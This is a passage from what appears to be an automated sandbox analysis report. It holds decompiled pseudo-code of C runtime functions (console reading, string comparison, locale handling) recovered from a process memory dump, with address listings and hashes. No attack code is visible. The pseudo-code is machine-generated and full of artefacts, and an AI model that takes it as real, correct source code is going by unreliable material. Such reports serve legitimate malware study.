									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0043EEAD())) = 0xc;
									 *(E0043EE9A()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00445002(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043EE9A()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0043EEAD())) = 0x16;
							E0043A5BB();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043EE9A()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					goto L59;
				} else {
					 *(E0043EE9A()) =  *_t212 & 0x00000000;
					_t145 = E0043EEAD();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                0x0044b609
                0x0044b610
                0x0044b62a
                0x0044b62c
                0x0044b994
                0x0044b994
                0x0044b999
                0x0044b999
                0x0044b9a1
                0x0044b9a7
                0x0044b9a7
                0x00000000
                0x0044b9a7
                0x0044b632
                0x0044b638
                0x00000000
                0x00000000
                0x0044b640
                0x0044b64c
                0x0044b64f
                0x0044b652
                0x0044b655
                0x0044b65c
                0x0044b65f
                0x0044b663
                0x0044b666
                0x0044b669
                0x00000000
                0x00000000
                0x0044b66f
                0x0044b672
                0x0044b678
                0x0044b692
                0x0044b694
                0x0044b990
                0x00000000
                0x0044b990
                0x0044b69a
                0x0044b69e
                0x00000000
                0x00000000
                0x0044b6a4
                0x0044b6a8
                0x00000000
                0x00000000
                0x0044b6af
                0x0044b6b3
                0x0044b6b6
                0x0044b6b9
                0x0044b6be
                0x0044b6be
                0x0044b6c1
                0x0044b6de
                0x0044b6e3
                0x0044b6e5
                0x0044b6e7
                0x0044b707
                0x0044b708
                0x0044b70a
                0x0044b70d
                0x0044b70f
                0x0044b711
                0x0044b713
                0x0044b713
                0x0044b71e
                0x0044b720
                0x0044b727
                0x0044b72c
                0x0044b72f
                0x0044b732
                0x0044b734
                0x0044b759
                0x0044b75e
                0x0044b765
                0x0044b768
                0x0044b76b
                0x0044b76f
                0x0044b771
                0x0044b775
                0x0044b777
                0x0044b77a
                0x0044b77d
                0x0044b77f
                0x0044b782
                0x0044b789
                0x0044b78c
                0x0044b791
                0x0044b794
                0x0044b79d
                0x0044b7a1
                0x0044b7a4
                0x0044b7a7
                0x0044b7aa
                0x0044b7b0
                0x0044b7b2
                0x0044b7bb
                0x0044b7be
                0x0044b7c1
                0x0044b7c4
                0x0044b7c5
                0x0044b7c9
                0x0044b7cf
                0x0044b7d9
                0x0044b7de
                0x0044b7ee
                0x0044b7f2
                0x0044b7f5
                0x0044b7f7
                0x0044b7f9
                0x0044b7fb
                0x0044b7fd
                0x0044b805
                0x0044b806
                0x0044b809
                0x0044b80c
                0x0044b80d
                0x0044b813
                0x0044b81d
                0x0044b825
                0x0044b828
                0x0044b834
                0x0044b838
                0x0044b83b
                0x0044b83d
                0x0044b83f
                0x0044b841
                0x0044b843
                0x0044b84b
                0x0044b84c
                0x0044b84f
                0x0044b852
                0x0044b852
                0x0044b853
                0x0044b859
                0x0044b863
                0x0044b863
                0x0044b841
                0x0044b83d
                0x0044b828
                0x0044b7fb
                0x0044b7f7
                0x0044b7de
                0x0044b7b2
                0x0044b7aa
                0x0044b869
                0x0044b86f
                0x0044b871
                0x0044b8e4
                0x0044b8e4
                0x0044b8e8
                0x0044b8f8
                0x0044b8fe
                0x0044b900
                0x0044b95c
                0x0044b95c
                0x0044b964
                0x0044b965
                0x0044b967
                0x0044b980
                0x0044b983
                0x0044b8c0
                0x0044b8c1
                0x00000000
                0x0044b8c6
                0x0044b989
                0x00000000
                0x0044b989
                0x0044b96e
                0x0044b979
                0x00000000
                0x0044b979
                0x0044b902
                0x0044b905
                0x0044b908
                0x00000000
                0x00000000
                0x0044b90a
                0x0044b90a
                0x0044b90d
                0x0044b910
                0x0044b913
                0x0044b91a
                0x0044b91f
                0x0044b921
                0x0044b925
                0x0044b940
                0x0044b944
                0x0044b945
                0x0044b948
                0x0044b949
                0x0044b955
                0x0044b94b
                0x0044b94b
                0x0044b94b
                0x0044b927
                0x0044b927
                0x0044b927
                0x0044b932
                0x0044b937
                0x0044b93a
                0x0044b93a
                0x00000000
                0x0044b91f
                0x0044b876
                0x0044b879
                0x0044b880
                0x0044b885
                0x00000000
                0x00000000
                0x0044b88e
                0x0044b894
                0x0044b896
                0x00000000
                0x00000000
                0x0044b898
                0x0044b89c
                0x00000000
                0x00000000
                0x0044b8b0
                0x0044b8b6
                0x0044b8b8
                0x0044b8dc
                0x0044b8df
                0x00000000
                0x0044b8df
                0x0044b8ba
                0x00000000
                0x0044b736
                0x0044b73b
                0x0044b746
                0x0044b8c7
                0x0044b8c7
                0x0044b8c7
                0x0044b8ca
                0x0044b8cb
                0x00000000
                0x0044b8d3
                0x0044b734
                0x0044b6e9
                0x0044b6ee
                0x0044b6f5
                0x0044b6fb
                0x00000000
                0x0044b6fb
                0x0044b6c3
                0x0044b6c6
                0x0044b6d0
                0x0044b6d0
                0x0044b6d3
                0x0044b6d6
                0x00000000
                0x0044b6d6
                0x0044b6ca
                0x0044b6cc
                0x0044b6ce
                0x00000000
                0x00000000
                0x00000000
                0x0044b6ce
                0x0044b67a
                0x0044b67f
                0x0044b687
                0x00000000
                0x0044b612
                0x0044b617
                0x0044b61a
                0x0044b61f
                0x0044b9ac
                0x00000000
                0x0044b9ac

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49796e171d8c6247e8b00cba545173f2417d4a934c5e5a2869158262b727af12
                • Instruction ID: bf7309e27d7813377405dfc29e16a9701e648260f6ca06a135f05bfcd2001108
                • Opcode Fuzzy Hash: 49796e171d8c6247e8b00cba545173f2417d4a934c5e5a2869158262b727af12
                • Instruction Fuzzy Hash: D2C108B0D04249AFEF11DFA9C841BAE7BB4EF09304F14409AE514A7392C778D941CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00452603 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00452603(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46f00c; // 0xd60a1515
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E00444FE6(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00444FE6(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00444A38(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00455A90();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00444A38(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00455A90();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00446EAF(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00434713(_t130);
													}
												}
											}
										}
									}
								}
								E00434713(_t100);
							}
						}
					}
				}
				L63:
				return E004338BB(_v8 ^ _t132);
			}






































                0x0045260b
                0x00452612
                0x0045261a
                0x0045261d
                0x00452623
                0x00452626
                0x00452629
                0x0045262d
                0x00452630
                0x00452635
                0x0045265c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00452637
                0x0045263f
                0x00452641
                0x00452645
                0x00452645
                0x0045264a
                0x00452668
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0045264c
                0x00452655
                0x0045266a
                0x0045266a
                0x0045266f
                0x00452676
                0x00452679
                0x00452679
                0x0045267e
                0x0045268a
                0x00452697
                0x004526a4
                0x004526b7
                0x00000000
                0x004526b9
                0x004526bb
                0x004526ee
                0x00000000
                0x004526f0
                0x004526f2
                0x004526f6
                0x004526fc
                0x004526ff
                0x00452701
                0x00452704
                0x00452704
                0x00452709
                0x00000000
                0x00000000
                0x0045270b
                0x0045270f
                0x00452719
                0x0045271e
                0x00000000
                0x00452720
                0x00000000
                0x00452720
                0x0045271e
                0x00000000
                0x0045270f
                0x00452704
                0x004526ff
                0x00000000
                0x004526f6
                0x004526bd
                0x004526bf
                0x004526c3
                0x004526c9
                0x004526cc
                0x004526ce
                0x004526ce
                0x004526d3
                0x00000000
                0x00000000
                0x004526d5
                0x004526d9
                0x004526e3
                0x004526e8
                0x00000000
                0x004526ea
                0x00000000
                0x004526ea
                0x004526e8
                0x00000000
                0x004526d9
                0x004526ce
                0x004526cc
                0x00000000
                0x004526c3
                0x004526bb
                0x004526a6
                0x004526a6
                0x004526a6
                0x00000000
                0x004526a6
                0x00452699
                0x00452699
                0x0045269b
                0x0045268c
                0x0045268c
                0x0045268e
                0x0045268e
                0x00452725
                0x00452725
                0x00452725
                0x00452732
                0x00452738
                0x0045273d
                0x0045265e
                0x00452743
                0x00452743
                0x0045274b
                0x0045274f
                0x004527aa
                0x004527ac
                0x00000000
                0x00452751
                0x00452756
                0x00452758
                0x0045275a
                0x00452762
                0x00452786
                0x0045278b
                0x00452790
                0x00452796
                0x00000000
                0x0045279c
                0x0045279c
                0x00000000
                0x0045279c
                0x00452764
                0x00452766
                0x0045276a
                0x0045276f
                0x00452771
                0x00452776
                0x0045288b
                0x0045288b
                0x0045277c
                0x0045277c
                0x004527a2
                0x004527a2
                0x004527a5
                0x004527af
                0x004527b1
                0x00000000
                0x004527b7
                0x004527bf
                0x004527cd
                0x00000000
                0x004527d3
                0x004527dc
                0x004527e2
                0x004527e7
                0x00000000
                0x004527ed
                0x004527ed
                0x004527f0
                0x004527f5
                0x004527f9
                0x00452845
                0x00000000
                0x004527fb
                0x00452800
                0x00452802
                0x00452804
                0x0045280c
                0x00452829
                0x00452833
                0x00452835
                0x00452838
                0x00000000
                0x0045283a
                0x0045283a
                0x00000000
                0x0045283a
                0x0045280e
                0x00452810
                0x00452814
                0x00452819
                0x0045281d
                0x0045287f
                0x0045287f
                0x0045281f
                0x0045281f
                0x00452840
                0x00452840
                0x00452847
                0x00452849
                0x00000000
                0x00452862
                0x00452862
                0x0045287b
                0x0045287b
                0x00452849
                0x0045281d
                0x0045280c
                0x00452883
                0x00452888
                0x004527e7
                0x004527cd
                0x004527b1
                0x00452776
                0x00452762
                0x0045288f
                0x00452895
                0x0045273d
                0x0045267e
                0x0045264a
                0x00452897
                0x004528aa

                APIs
                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004528DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004526AF
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452732
                • __alloca_probe_16.LIBCMT ref: 0045276A
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004528DC,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527C5
                • __alloca_probe_16.LIBCMT ref: 00452814
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527DC
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452858
                • __freea.LIBCMT ref: 00452883
                • __freea.LIBCMT ref: 0045288F
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                • String ID:
                • API String ID: 201697637-0
                • Opcode ID: 869e1f5eeb49bbb079ea2563c9337cb9b33b60cafbe4efd3de06afce2afdede7
                • Instruction ID: ccc14fa8acdac63bc9519f5215d42201de6c5a87ae6f625bde0ffe2347fa224d
                • Opcode Fuzzy Hash: 869e1f5eeb49bbb079ea2563c9337cb9b33b60cafbe4efd3de06afce2afdede7
                • Instruction Fuzzy Hash: 07911871E002169BDF249EA5C981EEF7BB59F4A311F18062BEC00E7242D779CC498768
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00443A7A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 71%
                			E00443A7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46f00c; // 0xd60a1515
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00446A95(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E004431C4(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E00444A38(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xcea3
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004463E1(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043A5E8();
									asm("int3");
									_t169 =  *0x470518; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E00442ED1(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E0044F9AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x45b4e8, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004358BA( &_v528,  *0x46f170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x45b428; // 0x40f943
									 *0x4574c8(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46f2a8;
										if(_t228 != 0x46f2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E00445002( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E00445002( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xcea3
												E00445002( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xcea3
										E00445002( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E00445002(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E004338BB(_v8 ^ _t262);
				}
				L47:
			}

























































                0x00443a7d
                0x00443a85
                0x00443a8c
                0x00443a8f
                0x00443a90
                0x00443a93
                0x00443a97
                0x00443a98
                0x00443a9b
                0x00443aab
                0x00443ab7
                0x00443ace
                0x00443ad3
                0x00443ad8
                0x00443aed
                0x00443af0
                0x00443af0
                0x00443af3
                0x00443af9
                0x00443b02
                0x00443b04
                0x00443b07
                0x00443b0e
                0x00443b11
                0x00443b17
                0x00000000
                0x00000000
                0x00443b19
                0x00443b1d
                0x00443b46
                0x00443b46
                0x00443b1f
                0x00443b1f
                0x00443b23
                0x00443b27
                0x00443b2e
                0x00443b34
                0x00000000
                0x00443b36
                0x00443b36
                0x00443b39
                0x00443b3c
                0x00443b44
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00443b44
                0x00443b34
                0x00443b53
                0x00443b53
                0x00443b55
                0x00443b5b
                0x00443b61
                0x00443b64
                0x00443b64
                0x00443b67
                0x00443b6a
                0x00443b6a
                0x00443b7a
                0x00443b88
                0x00443b8d
                0x00443b94
                0x00443b96
                0x00000000
                0x00443b9c
                0x00443ba2
                0x00443ba8
                0x00443baf
                0x00443bb5
                0x00443bb8
                0x00443bbe
                0x00443bcb
                0x00443bd2
                0x00443bd7
                0x00443bda
                0x00443bdc
                0x00443e35
                0x00443e3b
                0x00443e3c
                0x00443e3d
                0x00443e3e
                0x00443e3f
                0x00443e40
                0x00443e45
                0x00443e46
                0x00443e4b
                0x00443be2
                0x00443be2
                0x00443bf0
                0x00443bf3
                0x00443c0e
                0x00443c15
                0x00443c1b
                0x00443c21
                0x00443bf5
                0x00443bf5
                0x00443bfd
                0x00000000
                0x00443bff
                0x00443bff
                0x00443c05
                0x00443c05
                0x00443bfd
                0x00443c28
                0x00443c2b
                0x00443d48
                0x00443d4b
                0x00443d58
                0x00443d5b
                0x00443d63
                0x00443d63
                0x00443d4d
                0x00443d53
                0x00443d53
                0x00443c31
                0x00443c31
                0x00443c37
                0x00443c3f
                0x00443c41
                0x00443c44
                0x00443c4d
                0x00443c56
                0x00443c5c
                0x00443c5c
                0x00443c5f
                0x00443c61
                0x00000000
                0x00000000
                0x00443c63
                0x00443c69
                0x00443c6a
                0x00443c75
                0x00443c7d
                0x00443c85
                0x00443c88
                0x00443c8b
                0x00443c91
                0x00443c97
                0x00443c9d
                0x00443ca3
                0x00443ca6
                0x00000000
                0x00000000
                0x00443ca8
                0x00443ccd
                0x00443ccd
                0x00443cd0
                0x00443cd4
                0x00443ced
                0x00443cf2
                0x00443cf5
                0x00443cf7
                0x00443cfd
                0x00443d38
                0x00443cff
                0x00443cff
                0x00443d04
                0x00443d0c
                0x00443d0d
                0x00443d0d
                0x00443d24
                0x00443d2b
                0x00443d2e
                0x00443d33
                0x00443d33
                0x00443d3b
                0x00443d3e
                0x00443d3e
                0x00443d43
                0x00000000
                0x00443d43
                0x00443caa
                0x00443cac
                0x00443cb1
                0x00443cb7
                0x00443cc0
                0x00443cc9
                0x00443cc9
                0x00000000
                0x00443cac
                0x00443d66
                0x00443d66
                0x00443d6a
                0x00443d72
                0x00443d78
                0x00443d7b
                0x00443d81
                0x00443d83
                0x00443dc3
                0x00443dc9
                0x00443dd0
                0x00443dd0
                0x00443dd6
                0x00443dda
                0x00000000
                0x00443ddc
                0x00443ddc
                0x00443de0
                0x00443de5
                0x00443de9
                0x00443dee
                0x00443df5
                0x00443e03
                0x00443e09
                0x00443e0c
                0x00443e0c
                0x00443dda
                0x00443e1b
                0x00443e23
                0x00443e2c
                0x00443d85
                0x00443d8b
                0x00443d8e
                0x00443d95
                0x00443da7
                0x00443dae
                0x00443dbb
